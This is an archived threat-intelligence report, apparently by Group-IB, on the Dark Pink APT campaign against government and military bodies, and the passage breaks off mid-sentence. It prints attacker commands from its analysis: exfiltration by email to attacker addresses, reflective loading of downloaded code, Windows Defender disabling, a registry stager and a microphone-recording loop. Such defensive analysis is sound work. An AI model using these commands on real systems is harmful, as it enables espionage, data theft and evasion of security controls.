{ "id": "75745142-ac77-44ad-8f9a-a1e60df2c163", "created_at": "2026-04-06T00:08:03.633119Z", "updated_at": "2026-04-10T13:12:22.694104Z", "deleted_at": null, "sha1_hash": "ecc44c1803892dc2a4d04590c41c1245fff5e536", "title": "Dark Pink", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1159504, "plain_text": "Dark Pink\r\nArchived: 2026-04-02 12:25:17 UTC\r\nAcknowledgements\r\nWe would like to specifically thank Albert Priego, Malware Analyst at Group-IB, for discovering the first Dark\r\nPink attacks and for conducting the initial research into this particular threat actor. His efforts made a major\r\ncontribution to this blog and for our future research into this APT group.\r\nIntroduction\r\nCountries of the Asia-Pacific region have long been the target of advanced persistent threat (APT) groups. Earlier\r\nGroup-IB research found that this region has often been a “key arena” of APT activity, and a mixture of nation-state threat actors from China, North Korea, Iran, and Pakistan have been tied to a wave of attacks in the region.\r\nMore often than not, the primary motive for APT attacks in the Asia-Pacific (APAC) region is not financial gain,\r\nbut rather espionage.\r\nGroup-IB continuously explores and analyzes the methods, tools, and tactics used by some of the world’s\r\nmost prominent APT groups, such as APT41, but how can large-scale companies and organizations protect\r\nthemselves when a new APT group emerges, or, if an already existing APT group begins to utilize a completely\r\nnew toolkit. Enter Dark Pink.\r\nDark Pink is the name given by Group-IB to a new wave of APT attacks that has struck the APAC region.\r\nAt the present time, Group-IB cannot attribute the campaign to any known threat actor, making it highly likely\r\nthat Dark Pink is an entirely new APT group. Bearing this in mind, we will refer to Dark Pink as an APT group\r\nthroughout the entirety of this text. The name Dark Pink was coined by forming a hybrid of some of the email\r\naddresses used by the threat actors during data exfiltration. The APT group has also been termed Saaiwc Group by\r\nChinese cybersecurity researchers.\r\nThere is evidence to suggest that Dark Pink began operations as early as mid-2021, although the group’s activity\r\nsurged in mid-to-late 2022. To date, Group-IB’s sector-leading Threat Intelligence uncovered seven confirmed\r\nattacks by Dark Pink. The bulk of the attacks were carried out against countries in the APAC region, although\r\nthe threat actors spread their wings and targeted one European governmental ministry. The confirmed victims\r\ninclude two military bodies in the Philippines and Malaysia, government agencies in Cambodia, Indonesia\r\nand Bosnia and Herzegovina, and a religious organization in Vietnam. Group-IB also became aware of an\r\nunsuccessful attack on a European state development agency based in Vietnam. In line with Group-IB’s zero\r\ntolerance policy to cybercrime, confirmed and potential victims of Dark Pink were issued proactive\r\nnotifications, and we note that the list of companies breached by this particular APT group is likely to be longer.\r\nGroup-IB’s early research into Dark Pink has revealed that these threat actors are leveraging a new set of tactics,\r\ntechniques, and procedures rarely utilized by previously known APT groups. They leverage a custom toolkit,\r\nfeaturing TelePowerBot, KamiKakaBot, and Cucky and Ctealer information stealers (all names dubbed by Group-https://www.group-ib.com/blog/dark-pink-apt/\r\nPage 1 of 24\n\nIB) with the aim of stealing confidential documentation held on the networks of government and military\r\norganizations. Of particular note is Dark Pink’s ability to infect even the USB devices attached to\r\ncompromised computers, and also its ability to gain access to messengers on infected machines. Furthermore,\r\nDark Pink threat actors utilize two core techniques: DLL Side-Loading and executing malicious content\r\ntriggered by a file type association (Event Triggered Execution: Change Default File Association). The latter of\r\nthese tactics is one rarely seen utilized in the wild by threat actors.\r\nAt the time of writing, Dark Pink is still active. Given the fact that many of the attacks identified by Group-IB\r\nresearchers took place in the final months of 2022, Group-IB researchers are still in the process of identifying\r\nthe full scope of the APT attack, and efforts to uncover the origin of this APT group are in process. However, we\r\nbelieve that this preliminary research, which will be of great interest to CISO, heads of cybersecurity teams, SOC\r\nanalysts and incident response specialists, will go a long way to raising awareness of the new TTPs utilized by this\r\nthreat actor and help organizations to take the relevant steps to protect themselves from a potentially\r\ndevastating APT attack.\r\nKey findings\r\nDark Pink launched seven successful attacks against high-profile targets between June and December\r\n2022.\r\nDark Pink’s first activity, which we tie to a Github account leveraged by the threat actors, was recorded in\r\nmid-2021, and the first attack attributable to this APT group took place in June 2022. Their activity\r\npeaked in the final three months of 2022 when they launched four confirmed attacks.\r\nDark Pink’s victims are located in five APAC countries (Vietnam, Malaysia, Indonesia, Cambodia,\r\nPhilippines) and one European country (Bosnia and Herzegovina).\r\nVictims included military bodies, government and development agencies, religious organizations, and a\r\nnon-profit organization.\r\nOne unsuccessful attack was launched against a European state development agency based in Vietnam in\r\nOctober 2022.\r\nDark Pink APT’s primary goals are to conduct corporate espionage, steal documents, capture the sound\r\nfrom the microphones of infected devices, and exfiltrate data from messengers.\r\nDark Pink’s core initial vector was targeted spear-phishing emails that saw the threat actors pose as job\r\napplicants. There was evidence to suggest that the threat actors behind Dark Pink scanned online job\r\nvacancy portals and crafted unique emails to victims that were advertising vacancies.\r\nAlmost all the tools leveraged by the threat actors were custom and self-made, including TelePowerBot and\r\nKamiKakaBot, along with the Cucky and Ctealer stealers. During our investigation, we noticed only one\r\npublic tool: PowerSploit/Get-MicrophoneAudio.\r\nDark Pink APT utilized a rarely seen technique, termed Event Triggered Execution: Change Default\r\nFile Association, to ensure launch of malicious TelePowerBot malware. Another technique leveraged by\r\nthese particular threat actors was DLL Side-Loading, which they used to avoid detection during initial\r\naccess.\r\nThe threat actors created a set of PowerShell scripts to carry out communication between victim and\r\nthreat actors’ infrastructure, facilitate lateral movement and network reconnaissance.\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 2 of 24\n\nAll communication between infected infrastructure and the threat actors behind Dark Pink is based on\r\nTelegram API.\r\nDark Pink takes on all comers\r\nThe attacks carried out by this particular APT group have been advanced in every sense of the word. They have\r\nutilized a sophisticated mixture of custom tools to breach the defenses of multiple government and military\r\norganizations. The first attack Group-IB analysts were able to attribute to this APT group was registered on\r\na religious organization in Vietnam in June 2022. However, they appear to have been active well before that, as\r\nGroup-IB researchers identified a Github account used by these threat actors which showed activity dating back to\r\nmid-2021. According to our research, the malware initialized by the threat actors can issue commands for an\r\ninfected machine to download modules from this particular Github account. Interestingly, the threat actors\r\nappeared to use only one Github account for the entire duration of the campaign to date, which could suggest\r\nthat they have been able to operate without detection for a significant period of time.\r\nFigure 1: Screenshot detailing activity on Github account attributed to Dark Pink APT in 2021 (above) and 2022\r\n(below)\r\nFollowing the June 2022 attack, Group-IB researchers were unable to attribute any other malicious activity to\r\nDark Pink. However, this APT group burst into life towards the end of the summer, when Group-IB noticed an\r\nattack on a Vietnamese non-profit organization in August 2022 bearing all the hallmarks of the June attack.\r\nFrom then, Group-IB was able to attribute one attack in September, two attacks (one successful, one unsuccessful)\r\nin October, two in November, and one in December. Most recently, Group-IB discovered that Dark Pink was able\r\nto breach an Indonesian governmental organization on December 8, 2022.\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 3 of 24\n\nFigure 2: Dark Pink APT timeline and targets\r\nKill Chain\r\nThe sophistication of the Dark Pink campaign is evidenced by its multiple distinct kill chains. The threat actors\r\nbehind this wave of attacks were able to craft their tools in several programming languages, giving them\r\nflexibility as they attempted to breach defense infrastructure and gain persistence on victims’ networks. As a\r\nresult, we will discuss the different steps and stages of these processes, but it is important to note that the bulk of\r\nthe attacks were based on PowerShell scripts or commands that aimed to launch communication between the\r\ninfected networks and the threat actors’ infrastructure.\r\nInitial access was achieved by successful spear-phishing emails. These messages contained a shortened link\r\ndirecting the victim to download a malicious ISO image, which in one case seen by Group-IB, was stored on the\r\npublic, free-to-use sharing service MediaFire. Once the ISO image was downloaded by the victims, Group-IB\r\nidentified three distinct infection chains, which we will detail below.\r\nThe first thing that caught our attention was that all communication between the devices of the threat actors and\r\nthe victims was based on Telegram API. The custom modules created by the threat actors, TelePowerBot and\r\nKamiKakaBot, are designed to read and execute commands via a threat actor-controlled Telegram bot.\r\nInterestingly, these modules were developed in different programming languages. TelePowerBot is represented as\r\nPowerShell script, while KamiKakaBot, which includes stealer functionalities, is developed on .NET. The threat\r\nactors have used the same Telegram bots for a long period of time, as one has been used since September 2021.\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 4 of 24\n\nAdditionally, Dark Pink APT utilizes the self-made stealers Ctealer and Cucky to steal victim credentials\r\nfrom web browsers. We will look at each of the above mentioned tools later in this report. At this stage, we will\r\nturn to detailing each step of the infection chain.\r\nInitial access\r\nA large part of the success of Dark Pink was down to the spear-phishing emails used to gain initial access. In one\r\nsuch attack, Group-IB was able to find the original email sent by the threat actors. In this one instance, the threat\r\nactor posed as a job applicant applying for the position of PR and Communications intern. In the email, the threat\r\nactor mentions that they found the vacancy on a jobseeker site, which could suggest that the threat actors scan\r\njob boards and use this information to create highly relevant phishing emails.\r\nThe emails contain a shortened URL linking to a free-to-use file sharing site, where the victim is presented with\r\nthe option to download an ISO image that contains all the files needed for the threat actors to infect the victim’s\r\nnetwork. During our investigation into Dark Pink, we discovered that the threat actors leveraged several different\r\nISO images, and we also noted that the documents contained in these ISO images varied from case to case.\r\nAccording to the information available to us, we strongly believe that the Dark Pink threat actors craft a\r\nunique email to each victim, and we do not discount that the threat actors can send the malicious ISO image as a\r\ndirect attachment to the victim via email.\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 5 of 24\n\nFigure 3: Screenshot of original spear-phishing email sent by Dark Pink APT noting the storage of the ISO image\r\non a file-sharing site.\r\nThe ISO images sent in the spear-phishing emails contained varying numbers of files. However, there are three\r\ntypes of file found in all of the ISO images sent by the threat actors: a signed executable file, a nonmalicious\r\ndecoy document (e.g. .doc, .pdf, or .jpg), and a malicious DLL file. Given that the email relates to a job opening,\r\none can assume that the victim will first look for the supposed applicant’s resume, which is often sent as a MS\r\nWord document. However, In Dark Pink attacks, the threat actors include an .exe file in the ISO image that\r\nmimics a MS Word file. The file contains “.doc” in the file name and contains the MS Word icon as a means of\r\nconfusing the victim and thinking that the file is safe to open.\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 6 of 24\n\nFigure 4: Screenshot detailing the five files contained in one ISO image seen by Group-IB. Note that the .doc and\r\n.dll files are in hidden view.\r\nShould the victim execute the .exe file first, the malicious DLL file, located in the same folder as the .exe file, will\r\nrun automatically. This is a technique used by threat actors known as DLL Side-Loading. The primary function of\r\nthe DLL execution is to ensure that the threat actors’ core malware, TelePowerBot, gains persistence. Before the\r\ncompletion of the file execution, the decoy document (e.g. a letter, resume), is shown on the victim’s screen.\r\nTrojan execution and persistence\r\nOne of the most interesting discoveries for Group-IB researchers was the process of how TelePowerBot or\r\nKamiKakaBot are launched on the victim’s machine. As mentioned previously, the malicious DLL file that\r\ncontains one of these two pieces of malware can be located inside the ISO image that is sent during spear-phishing\r\ncampaigns. In one case analyzed by Group-IB, the threat actors used a chain of MS Office documents and\r\nleveraged Template Injection, whereby the threat actors insert into the initial document a link to a template\r\ndocument that contains a malicious macro code. In two other cases examined by Group-IB researchers, the threat\r\nactors behind Dark Pink launched their malware by the DLL Side-Loading technique. In total, we found\r\nthree different kill chains leveraged by the threat actors, and we will detail them below.\r\nKill Chain 1: All-inclusive ISO\r\nThe first variant of the infection chain results in an ISO image being sent to the victim through spear-phishing\r\nemails. This ISO image includes a malicious DLL file, which contains TelePowerDropper (name given by Group-IB). The primary goal of this DLL file is to gain persistence for TelePowerBot in the registry of the infected\r\nmachine. In some cases, the DLL file can also launch the threat actors’ proprietary stealer Stealer, which parses\r\ndata from browsers on the victim’s machine and stores it in a local folder. It is important to note that launching\r\nany kind of stealer is optional during initial access. Dark Pink can send special commands to download and\r\nlaunch a stealer during all phases of attack.\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 7 of 24\n\nFigure 5: Graphic detailing the full scheme of Kill Chain 1\r\nIt is important to note at this stage that the DLL files are packed. When the file is launched, it decrypts itself and\r\npasses control to an unpacked version of itself. Additionally, once the DLL file is launched, a mutex will be\r\ncreated. One example of this was: gwgXSznM-Jz92k33A-uRcCCksA-9XAU93r5. Upon completion of this step, a\r\ncommand to start TelePowerBot will be added to autorun. This means that TelePowerBot will be launched each\r\ntime the user logs into their system. This is facilitated by creating a registry key by path\r\nHKCU\\Environment\\UserInitMprLogonScript. The value of the created key is as follows:\r\nforfiles.exe /p %system32% /m notepad.exe /c \"cmd.exe /c whoami \u003e\u003e %appdata%\\a.abcd \u0026\u0026 %appdata%\\a.ab\r\nThe above code reveals that the command launches a standard utility, whoami, which shows information about the\r\ncurrent user of the machine. The output is redirected to a file and execution is finished.\r\nAt this point it might not be entirely clear how the next stage, and the launching of TelePowerBot, begins. The key\r\nto this answer is the file extension .abcd. In short, the threat actors create a file with this extension name as part of\r\na technique termed Event Triggered Execution: Change Default File Association. The idea is to add a handler to\r\nwork with the unrecognized file extension in the registry key tree. This is detailed in the below screenshot.\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 8 of 24\n\nFigure 6: Screenshot detailing command to run upon creation of file with extension .abcd\r\nThe above screenshot details part of a PowerShell command that is triggered when a file is created with the\r\nspecific extension .abcd. The PowerShell commands are stored in base64 view and are highly obfuscated. The\r\nresult of these commands are relatively simple: read registry key, decrypt, and launch TelePowerBot.\r\nKill Chain 2: Github macros\r\nThe second variation of the infection chain is almost identical to the preceding one. The only thing that differs is\r\nthe file used in the initial stage. During our analysis, we discovered that the threat actors used commands to\r\nautomatically download a malicious template document containing TelePowerBot from Github upon opening\r\nof the .doc contained in the initial ISO file. Macro code written into this template document then works to ensure\r\npersistence for the malware.\r\nFigure 7: Graphic detailing the full scheme of Kill Chain 2\r\nIn this instance, the ISO image sent to the victims contains a MS Word document that leads to the automatic\r\ndownload of a malicious template document, which contains TelePowerBot, from Github. In order to evade\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 9 of 24\n\nantivirus defenses on an infected machine during initial access, macro code is written into the template document.\r\nThis technique is known as Template Injection. The macro contains several forms with fields, and during\r\nexecution, the value of these form fields are read and established as a value in registry keys.\r\nThis trick can help the malware avoid detection by antivirus software, as the document itself does not contain any\r\nmalicious functionalities or code. The coded documents contain forms with several parameters, and the macros\r\ncontained in these files can read these values and work to ensure persistence of TelePowerBot on the victim’s\r\nmachine.\r\nFigure 8: Screenshot detailing two forms contained predefined keys and values that are written to the registry by\r\nthe malicious macro code written into the MS Word file sent to victims\r\nKill Chain 3: X(ML) marks the spot\r\nThe third and final kill chain variant that we will detail is one that was used in the most recent Dark Pink attack\r\nanalyzed by Group-IB, which saw the threat actors breach the network of an Indonesian government agency\r\non December 8, 2022. The ISO image sent to the victim in a spear-phishing email contained decoy documents, a\r\nsigned legitimate MS Word file, and a malicious DLL named KamiKakaDropper. The primary goal of this\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 10 of 24\n\ninfection vector is to persist KamiKakaBot on infected machines. In this kill chain, an XML file is located at the\r\nend of the decoy document in encrypted view. The malicious DLL file is, as in Kill Chain 1, launched by the DLL\r\nSide-Loading technique. Once the DLL file is launched, the XML file that kicks off the next stage of the kill chain\r\nwill be decrypted from the decoy document and saved in the infected machine.\r\nFigure 9: Graphic detailing the full scheme of Kill Chain 3\r\nThe XML file contains an MSBuild project that includes a task to execute .NET code. To find more about how this\r\nprocess works, please refer to the following Microsoft documentation. The logic of the .NET code is simple:\r\nlaunch KamiKakaBot, which itself is located in the XML file (packed and encoded in base64 format). After this\r\nfile is unpacked, control is passed to KamiKakaBot.\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 11 of 24\n\nFigure 10: Snippet of code inside XML file that unpacks and launches KakaKamiBot\r\nThe path to the XML file is passed as an argument upon the launch of MSBuild. The command to run MSBuild is\r\nlocated in the registry key (HKCU\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell), which is\r\ncreated during execution of the DLL file. Once this step is completed, MSBuild will run each time a user logs on\r\nto the system. In addition, the DLL creates a repeatable task to log the victim off from the system.\r\nReconnaissance and lateral movement\r\nAfter infecting a computer in the victim organization’s network, the next goal for Dark Pink is to collect as\r\nmuch information as possible about the victim’s network infrastructure. From our analysis, we see that the\r\nthreat actors are interested in the following:\r\ninformation from standard utility, e.g output of standard utility systeminfo.\r\ninformation from web browsers.\r\ninstalled software, including antivirus solutions.\r\ninformation about connected USB devices and network sharing.\r\nThe threat actors also collect a list of network and USB drives that are available for writing, and these are then\r\nused for lateral movement. Next, instead of the original file, the attack sees the creation of a LNK file (Windows\r\nshortcut) with a command to launch TelePowerDropper. At this stage, the original files are hidden from the user.\r\nOne of the most interesting revelations of our investigation into Dark Pink was how the threat actors carry out\r\nlateral movement over USB devices. For this, a new WMI event handler is registered. From this point onwards,\r\neach time a USB flash drive is plugged into an infected machine, a specific action will be executed that sees\r\nTeleBotDropper downloaded and stored on the flash drive. Let’s analyze this process a little deeper.\r\n1. Victim plugs USB flash drive into infected device\r\n2. The WMI event is triggered, and results in the automatic download of a .ZIP archive from the threat actors’\r\nGithub account. There are three files inside this archive: Dism.exe, Dism.sys, and Dismcore.dll. The first of\r\nthese files is a legitimate file with a valid digital signature. The functionality of the DLL file is to unpack\r\nthe original executable from file Dism.sys.\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 12 of 24\n\n3. Archive is extracted to %tmp% folder. The files are then copied to the USB device, where a new folder\r\nnamed “dism” is created. The folder attribution is changed to hidden and system.\r\n4. A file named system.bat is created, containing a command to launch Dism.exe\r\n5. Finally, as many LNK files are created as there are folders on the USB drive. The attributes of the original\r\nfolder are changed to hidden and system. A LNK file is created with a command to open the hidden folder\r\nin explorer.exe and launch system.bat.\r\nFollowing this process, the user will see LNK files bearing the same name as folders found on the USB device.\r\nOnce the user opens this malicious LNK file, TeleBotDropper will be launched by the DLL Side-Loading\r\ntechnique (the functionalities of TeleBotDropper have been already shown in the previous section). As a result, the\r\ncommands, which read registry key, decrypt, and launch TelePowerBot, are then transferred to a new machine. It\r\nis imperative to remember that this solution works if there is only one folder on the USB device. This is why we\r\nobserved different implementations, for example, the creation of LNK files instead of .pdf files (not only for\r\nfolders) on USB devices. An example of how this works in more detail is provided in APPENDIX B. The\r\nmechanism of creating LNK files in place of the original files is also used for network sharing.\r\nData exfiltration\r\nAs is the case with many other attacks of this kind, the threat actors exfiltrate data through ZIP archives. During\r\nDark Pink attacks, all data (list of files from common network shares, web browser data, documents, etc.) that is\r\nto be sent to the threat actors is stacked in the $env:tmp\\backuplog folder. However, the collection and sending\r\nprocess operate separately from one another. When the infected machine is issued a command to download the\r\n$env:tmp\\backuplog folder, the list of files will be copied to $env:tmp\\backuplog1 folder, added to archive and\r\nsent to the threat actors’ Telegram bot. After this step is completed, the $env:tmp\\backuplog1 directory is deleted.\r\nDark Pink threat actors can also leverage their self-made stealers Cucky and Ctealer to draw data from\r\ninfected machines. The functionalities of both of these stealers are the same. They can be used to extract data\r\nsuch as passwords, history, logins, and cookies from web browsers. The stealers themselves do not require any\r\ninternet connection, as they save the result of the execution (stolen data) to files. Both of the stealers can be\r\ndownloaded from the threat actors’ Github account automatically by commands issued by the malware. An\r\nexample of the script used to launch Cucky is shown in APPENDIX C.\r\nIn total, Group-IB researchers discovered that Dark Pink exfiltrated files via three separate pathways. The first\r\nof these pathways sees the threat actors use Telegram to receive files. As a device is infected, information is\r\ncollected in a specific folder by the malware and sent via Telegram by a special command. By extension, the files\r\nthat are sent to the threat actors are: .doc, .docx, xls,.xlsx,.ppt,.pptx,.pdf. An example of a script that carries out\r\nthis process can be found in APPENDIX D.\r\nIn addition to Telegram, Group-IB found evidence that the threat actors exfiltrated files via Dropbox. This\r\nmethod is slightly different to the one used to exfiltrate via Telegram, as it involves a series of PowerShell scripts\r\nthat transfer files from a specific folder to a Dropbox account by performing a HTTP request with a hardcoded\r\ntoken.\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 13 of 24\n\nOne particular attack discovered by Group-IB was of particular surprise to us. Despite the device being controlled\r\nby commands issued by a threat actor-controlled Telegram channel via Telegram bots, some interesting files were\r\nsent via email. An example of this command is shown below.\r\n$filepath=\"$env:tmp/backuplog\";\r\n$cred = New-Object System.Management.Automation.PSCredential (\"lanhuong.jsc@outlook.com\",(ConvertTo-S\r\nSend-MailMessage -To \"blackpink.301@outlook[.]com\" -From \"blackred.113@outlook[.]com\"\r\n -Body \"hello badboy\" -SmtpServer \"smtp-mail.outlook.com\" -Port 587\r\n -Subject \"$env:computername\" -UseSsl -Credential $cred\r\n -Attachments (gci $filepath).fullname\r\nThe list of emails used during data exfiltration are shown below:\r\nblackpink.301@outlook[.]com\r\nalibaba.113@outlook[.]com\r\nalibaba.113@outlook[.]com.vn\r\nblackred.113@outlook[.]com\r\nlanhuong.jsc@outlook[.]com\r\nnphuongmai.97@outlook[.]com\r\nAt this stage, Group-IB researchers believe that the exfiltration method of choice depends on the potential\r\nrestrictions set out in the victim’s network infrastructure.\r\nEvasion techniques\r\nDuring their attacks, the threat actors used an already known technique to bypass User Account Control (UAC) to\r\nalter the settings in Windows Defender. They did this by elevating the COM interface. The methods used are not\r\nunique and different implementations were found in different programming languages.\r\nFigure 11: Screenshot of decompiled executable that allows UAC to be bypassed\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 14 of 24\n\nThe settings are changed by a special PowerShell script which is received as a command, and implemented in\r\n.NET application. This command comes in the form of an executable file (in base64 view) that is automatically\r\ndownloaded from Github upon infection. The executable does not gain persistence nor is it saved on an infected\r\nsystem. The executable does not persist and is not saved into an infected system. An example of downloading and\r\nlaunching are shown below.\r\n[Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object System.Net.WebClient).Down\r\n[NETLUA.Main]::BypassUAC(\"powershell\\\", \\\"-c {$command}\")\r\nThe PowerShell command to modify Windows Defender Settings is passed as an argument and is shown as\r\nfollows:\r\nSet-MpPreference -DisableArchiveScanning $true -ea 0;\r\nSet-MpPreference -DisableBehaviorMonitoring $true -Force -ea 0;\r\nSet-MpPreference -DisableCatchupFullScan $true -Force -ea 0;\r\nSet-MpPreference -DisableCatchupQuickScan $true -Force -ea 0;\r\nSet-MpPreference -DisableIntrusionPreventionSystem $true -Force -ea 0;\r\nSet-MpPreference -DisableIOAVProtection $true -Force -ea 0;\r\nSet-MpPreference -DisableRealtimeMonitoring $true -Force -ea 0;\r\nSet-MpPreference -DisableRemovableDriveScanning $true -Force -ea 0;\r\nSet-MpPreference -DisableRestorePoint $true -Force -ea 0;\r\nSet-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true -Force -ea 0;\r\nSet-MpPreference -DisableScanningNetworkFiles $true -Force -ea 0;\r\nSet-MpPreference -DisableScriptScanning $true -Force -ea 0;\r\nSet-MpPreference -EnableControlledFolderAccess Disabled -Force -ea 0;\r\nSet-MpPreference -EnableNetworkProtection AuditMode -Force -ea 0;\r\nSet-MpPreference -MAPSReporting Disabled -Force -ea 0;\r\nSet-MpPreference -SubmitSamplesConsent NeverSend -Force -ea 0;\r\nSet-MpPreference -PUAProtection Disabled -Force -ea 0\r\nThe PowerShell commands will be executed using the .NET application as a tool for privilege escalation.\r\nTools\r\nCucky\r\nCucky is a simple custom stealer developed on .NET. A variety of samples were found during the investigation.\r\nThe most analyzed versions were packed by Confuser. It does not communicate with the network, and collected\r\ninformation is saved in the folder %TEMP%\\backuplog. Cucky is able to draw data such as passwords, history,\r\nlogins, and cookies from targeted web browsers. Although we do not have any information related to the use of\r\nstolen data, we suppose that it can be used to gain access to email web clients, conduct additional infrastructure\r\nreconnaissance based on web history, compile a list of organization employees, distribute malicious attachments,\r\nand assess whether the compromised machine is real or virtual.\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 15 of 24\n\nCucky has the functionality to steal data from the following browsers:\r\nChrome, MS Edge, CocCoc, Chromium, Brave, Atom, Uran, Sputnik, Slimjet, Epic Privacy, Amigo, Vivaldy,\r\nKometa, Comodo, Nichrome, Maxthon, Comodo Dragon, Avast Browser, Yandex Browser.\r\nFigure 12: Screenshot of decompiled Cucky stealer\r\nThe sample found contained the path below to debug information:\r\nC:\\Users\\hoang\\source\\repos\\Cucky\\Cucky\\obj\\Release\\net46\\Cucky.pdb\r\nCtealer\r\nCtealer is an analog of Cucky but developed on C/C++. TelePowerDropper or a special command issued by the\r\nthreat actors can be used to deploy Ctealer. The working process is pretty similar to Cucky as well, as it also saves\r\ncollected files to the %TEMP%\\backuplog folder. Ctealer can draw information from the following web\r\nbrowsers:\r\nChrome, Chromium, MS Edge, Brave, Epic Privacy, Amigo, Vivaldi, Orbitum, Atom, Kometa, Dragon, Torch,\r\nComodo, Slimjet, 360 Browser, Maxthon, K-Melon, Sputnik, Nichrome, CocCoc, Uran, Chromodo, Yandex\r\nBrowser.\r\nThe sample found contained the path below to debug information:\r\nC:\\Users\\build\\source\\repos\\CtealWebCredential\\Release\\CtealWebCredential.pdb\r\nTelePowerBot\r\nAs we have already noted, TelePowerBot will be launched every time a user of an infected machine logs into\r\nthe system. When this happens, a special script will be launched. The script reads the value of another regkey (e.g\r\nHKCU\\SOFTWARE\\Classes\\abcdfile\\shell\\abcd), which begins decryption and launch of TelePowerBot. The\r\nencryption is based on xor where the key is an array number from 0 to 256. Before decryption, the original\r\npayload will be decoded from base64. The deobfuscated command example is shown below:\r\niex(\r\n [System.Text.Encoding]::UTF8.GetString(\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 16 of 24\n\n([System.Convert]::FromBase64String(\r\n(gp \"HKCU:\\\\SOFTWARE\\\\Classes\\\\abcdfile\\\\shell\" -Name \"abcd\").\"abcd\") | % -Be\r\n$_ = $_ -bxor $i%256;$i++;$_\r\n}\r\n)\r\n)\r\n) | iex\r\nThe decrypted stage is not final. It is an intermediate stage and also is based on PowerShell and is highly\r\nobfuscated. At this stage, the final script has already been stored in the stager but it is separated into blocks. From\r\nthis, a base64 string is created, and after decoding, we will be left with a ZIP stream. Finally, after all this,\r\nTelePowerBot is launched after unzipping.\r\nThis kind of tool communicates with a Telegram channel to receive new tasks from the threat actors. The bot can\r\ncommunicate with various infected devices, and the bot checks for new commands every 60 seconds. During\r\nexecution, the bot works with two register keys: HKCU\\Environment\\Update and HKCU\\Environment\\guid. The\r\nfirst one stores the last message id, which is processed from the Telegram bot (The parameter update_id from\r\nTelegram). The second key stores the unique identification of infected machines. It is generated by command\r\n[guid]::NewGuid() when the bot launches for the first time. Upon registration, the threat actors get various pieces\r\nof information about the infected machine such as ip, guid, computer name. The IP address is also ascertained via\r\na get request to https://ifconfig.me/ip. These processes are also based on PowerShell commands, and we will dig a\r\nlittle deeper into those later in the report. The bot implementation is shown in APPENDIX A.\r\nSome variants of this module contain additional functionality for ensuring lateral movement. All other\r\nfunctionalities are the same. In cases that Group-IB analyzed, the Telegram parameter can either be hardcoded in\r\nthe scripts or read from the registry key.\r\nKamiKakaBot\r\nKamiKakaBot is the .NET version of TelePowerBot, and we found very few differences between the pair of them.\r\nBefore commands are read, KamiKakaBot is able to exfiltrate from the Chrome, MS Edge, and Firefox browsers.\r\nIt is able to update itself and once it receives commands, it can pass an argument to the cmd.exe process.\r\nFigure 13: Screenshot detailing decompiled executable that contains KamiKakaBot\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 17 of 24\n\nPowerSploit/Get-MicrophoneAudio\r\nAs we have noted above, the threat actors behind Dark Pink almost exclusively leveraged custom made tools.\r\nHowever, to record the microphone audio from infected devices, they turned to a publicly available PowerSploit\r\nmodule – Get-MicrophoneAudio. This is loaded onto the victim’s machine via download from Github. Group-IB\r\nresearchers found that antivirus software on victim machines blocked this process when the threat actors\r\nattempted to launch the module. We found that the threat actors attempted to obfuscate the original PowerSploit\r\nmodule to make it undetectable, and these were unsuccessful. As a result, the threat actors returned to the drawing\r\nboard and added a script (below) that was successfully able to record the microphone audio on infected devices.\r\nStart-Job {\r\n while(1){\r\nps psr -erroraction 'silentlycontinue' | kill -force;sleep 30;\r\nni \"$($env:tmp)\\\\record\" -ItemType Directory -erroraction 'silentlycontinue';\r\nstart psr -ArgumentList \"/start /output $($env:tmp)\\\\record\\\\$((get-date).tostring('yyyyMMddH\r\nsleep 60;\r\nstart psr -ArgumentList \"/stop\"\r\n }\r\n}\r\nThis simple script launches a background task that triggers a standard utility PSR to capture sound every minute.\r\nThe recorded audio files will be saved inside a ZIP archive that is located in a temporary folder\r\n(%TEMP%\\record). The files are named according to the following template: ‘yyyyMMddHHmmss’. These audio\r\nfiles are then exfiltrated with a separate script that sends them (as a ZIP archive), to the threat actors’ Telegram\r\nbot.\r\nZMsg (Messenger exfiltration)\r\nThe threat actors are also interested in stealing data from messengers on infected devices. To this end, they\r\nare able to execute commands to identify leading messengers, such as Viber, Telegram, and Zalo. In the case of\r\nViber, these commands allow the threat actors to exfiltrate the %APPDATA%\\Viberpc folder on infected devices,\r\nwhich allows them to gain access to the messages and contact lists of the victims. We are still doing work to assess\r\nwhat the threat actors are able to draw from Telegram accounts on infected devices, but the case of Zalo is one that\r\npiqued our interest.\r\nIf Zalo messenger is present on the victim’s device, the threat actors can launch a command to download a special\r\nutility (dubbed ZMsg by Group-IB), from Github. This utility, which is a .NET application based on the FlaUI\r\nlibrary, allows the threat actors to exfiltrate the victim’s messages on the Zalo platform. FlaUI is a library that\r\nassists with the automatic UI testing of Windows applications, with the entry point usually an application or the\r\ndesktop to generate an automation element. Through this, it is possible to analyze sub-elements and interact with\r\nthem.\r\nZMsg iterates elements on Windows applications to discover those with particular names. For example, the\r\nelement with messages has the name “messageView”. All collected information is stored in the\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 18 of 24\n\n%TEMP%\\KoVosRLvmU\\ folder in files with the .dat and .bin extensions. File names are created as an encoded\r\nhex string, and are generated in accordance with the below template:\r\n%PERSON_NAME%_%DAY%_%MONTH%_%YEAR%\r\nCommands\r\nThe threat actors issue commands to an infected device by specifying ip, computer name, or botid. Tasks 